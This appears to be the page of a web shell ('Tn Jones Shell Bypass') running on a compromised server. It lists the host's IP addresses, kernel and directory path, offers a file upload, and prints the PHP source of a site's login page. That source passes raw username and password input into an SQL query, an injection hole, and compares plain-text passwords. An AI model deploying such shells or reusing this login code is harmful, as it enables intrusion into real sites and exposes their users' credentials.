Tn Jones Shell Bypass
:
3.142.135.214
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
rpl
/
report
/
Upload File:
files >> /home/upgov/www/rpl/report/index.php
<?php include("connection.php"); session_start(); // Starting Session $error=''; // Variable To Store Error Message if (isset($_POST['submit'])) { if (empty($_POST['username']) || empty($_POST['password'])) { $error = "invalid Field"; } else { $a=$_REQUEST['username']; $b=$_REQUEST['password']; $sql=mysql_query("select * from login where User='$a' and password='$b'"); if(mysql_num_rows($sql)>0) { session_regenerate_id(); $member = mysql_fetch_assoc($sql); $_SESSION['User'] = $member['User']; $_SESSION['password'] = $member['password']; $_SESSION['start'] = time(); // Taking now logged in time. // Ending a session in 30 minutes from the starting time. $_SESSION['expire'] = $_SESSION['start'] + (30 * 90); session_write_close(); header("location:dashboard.php"); exit(); } else { $error = "<center><font color='red' size='+1' face='andalus'><b>Username or Password is Invalid </b></font></center>"; } } } ?> <!DOCTYPE HTML> <html> <head> <title>LOGIN</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Shoppy Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyEricsson, Motorola web design" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all"> <!-- Custom Theme files --> <link href="css/style.css" rel="stylesheet" type="text/css" media="all"/> <!--js--> <script src="js/jquery-2.1.1.min.js"></script> <!--icons-css--> <link href="css/font-awesome.css" rel="stylesheet"> <!--Google Fonts--> <link href='//fonts.googleapis.com/css?family=Carrois+Gothic' rel='stylesheet' type='text/css'> <link href='//fonts.googleapis.com/css?family=Work+Sans:400,500,600' rel='stylesheet' type='text/css'> <!--static chart--> </head> <body> <div class="login-page"> <div class="login-main"> <div class="login-head"> <h1>UPPCL-RPL LOGIN</h1> </div> <div class="login-block"> <form id="lg-form" name="lg-form" method="post" > <input type="text" class="text" name="username" id='username' placeholder='USER_ID' required="required" style="font-family:andalus;" > <input type="password" name='password' id='password' placeholder='PASSWORD' required="required" style="font-family:andalus;" > <div class="forgot-top-grids"> <div class="forgot-grid"> <ul> <li> <input type="checkbox" id="brand1" value=""> <label for="brand1"><span></span>Remember me</label> </li> </ul> </div> <!--<div class="forgot"> <a href="#">Forgot password?</a> </div>--> <div class="clearfix"> </div> <?php echo $error;?> </div> <input type="submit" name='submit' value="Login"> <br><br> <div class="login-icons"> <ul> <li><a href="#" class="facebook"><i class="fa fa-facebook"></i></a></li> <li><a href="#" class="twitter"><i class="fa fa-twitter"></i></a></li> <li><a href="#" class="google"><i class="fa fa-google-plus"></i></a></li> </ul> </div> </form> <h5><a href="http://rpl.upgov.net">Go Back to Home</a></h5> </div> </div> </div> <!--inner block end here--> <!--copy rights start here--> <div class="copyrights"> <p>© 2018 DDU-GKY (Rama Infotech Pvt Ltd). All rights reserved | Design by <a href="http://ramaipl.com"><b>Rama Infotech Pvt Ltd</b></a></p> </div> <!--COPY rights end here--> <!--scrolling js--> <script src="js/jquery.nicescroll.js"></script> <script src="js/scripts.js"></script> <!--//scrolling js--> <script src="js/bootstrap.js"> </script> <!-- mother grid end here--> </body> </html>